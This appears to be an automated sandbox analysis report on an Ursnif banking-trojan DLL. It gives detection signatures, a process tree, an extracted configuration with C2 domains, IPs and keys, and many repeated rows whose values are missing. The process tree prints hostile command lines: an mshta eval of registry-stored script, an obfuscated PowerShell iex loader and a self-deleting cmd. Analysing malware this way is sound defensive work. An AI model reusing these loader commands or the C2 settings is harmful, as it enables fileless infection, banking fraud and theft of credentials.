Edit tour
Windows
Analysis Report
xaj0e933Uv.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 1900 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\xaj 0e933Uv.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 1796 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\xaj 0e933Uv.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 5132 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\xaj0 e933Uv.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 4084 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - explorer.exe (PID: 3616 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5716 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\xaj0e933 Uv.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 3504 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4440 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 6592 cmdline:
cmd /C "ns lookup myi p.opendns. com resolv er1.opendn s.com > C: \Users\use r\AppData\ Local\Temp \ADE6.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- mshta.exe (PID: 6548 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Jqlc='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Jqlc).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6644 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name axgp bo -value gp; new-al ias -name slctai -va lue iex; s lctai ([Sy stem.Text. Encoding]: :ASCII.Get String((ax gpbo "HKCU :Software\ AppDataLow \Software\ Microsoft\ 54E80703-A 337-A6B8-C DC8-873A51 7CAB0E").U rlsReturn) ) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6652 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6924 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\m5pod5s 5\m5pod5s5 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 7040 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES5F15.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\m5p od5s5\CSCD E04DA86164 41A6AC3074 D39CFFC1D3 .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 7144 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\a1gxko1 5\a1gxko15 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6040 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES73F5.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\a1g xko15\CSCE 08F5B50529 74B0783502 1DDCFF1297 .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 4 entries |
⊘No Sigma rule has matched
Timestamp: | 05/04/22-16:27:54.122082 05/04/22-16:27:54.122082 |
SID: | 2033203 |
Source Port: | 49769 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:27:53.231327 05/04/22-16:27:53.231327 |
SID: | 2033203 |
Source Port: | 49769 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:27:53.642851 05/04/22-16:27:53.642851 |
SID: | 2033203 |
Source Port: | 49769 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:27:33.120656 05/04/22-16:27:33.120656 |
SID: | 2033203 |
Source Port: | 49760 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_03435FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_0348BAD1 | |
Source: | Code function: | 2_2_034799BC | |
Source: | Code function: | 2_2_034765C2 |
Source: | Code function: | 2_2_0347FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_03431CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary or memory string: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: | Jump to behavior |
Source: | Code function: | 2_2_03435FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Code function: | 2_2_03434BF1 | |
Source: | Code function: | 2_2_03431645 | |
Source: | Code function: | 2_2_0343829C | |
Source: | Code function: | 2_2_0347B238 | |
Source: | Code function: | 2_2_0348FF4D | |
Source: | Code function: | 2_2_034767CA | |
Source: | Code function: | 2_2_0348D7F1 | |
Source: | Code function: | 2_2_0348154D | |
Source: | Code function: | 2_2_03493DB0 |
Source: | Code function: | 2_2_0347F2A9 |
Source: | Code function: | 2_2_03436D0A | |
Source: | Code function: | 2_2_0343190C | |
Source: | Code function: | 2_2_03434321 | |
Source: | Code function: | 2_2_034384C1 | |
Source: | Code function: | 2_2_03485312 | |
Source: | Code function: | 2_2_03482331 | |
Source: | Code function: | 2_2_03487950 | |
Source: | Code function: | 2_2_0347710A | |
Source: | Code function: | 2_2_034861AE | |
Source: | Code function: | 2_2_0348A806 | |
Source: | Code function: | 2_2_034800DC | |
Source: | Code function: | 2_2_03480782 | |
Source: | Code function: | 2_2_0348BE80 | |
Source: | Code function: | 2_2_03486DE0 | |
Source: | Code function: | 2_2_0347C431 | |
Source: | Code function: | 2_2_034774AE | |
Source: | Code function: | 2_2_03485220 | |
Source: | Code function: | 2_2_0348EAC5 | |
Source: | Code function: | 2_2_03483829 | |
Source: | Code function: | 2_2_034710C7 | |
Source: | Code function: | 2_2_0347D77A | |
Source: | Code function: | 2_2_0347B7D5 | |
Source: | Code function: | 2_2_034736BB | |
Source: | Code function: | 2_2_034764C4 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_034368BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_0343829B | |
Source: | Code function: | 2_2_03437EA9 | |
Source: | Code function: | 2_2_034938A9 | |
Source: | Code function: | 2_2_03493DAF | |
Source: | Code function: | 2_2_03473496 |
Source: | Static PE information: |
Source: | Code function: | 2_2_034786AD |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_0348BAD1 | |
Source: | Code function: | 2_2_034799BC | |
Source: | Code function: | 2_2_034765C2 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0347FD47 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 2_2_034786AD |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_03478FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_03433365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_034881F1 |
Source: | Code function: | 2_2_034341FA |
Source: | Code function: | 2_2_03436D78 |
Source: | Code function: | 2_2_03433365 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
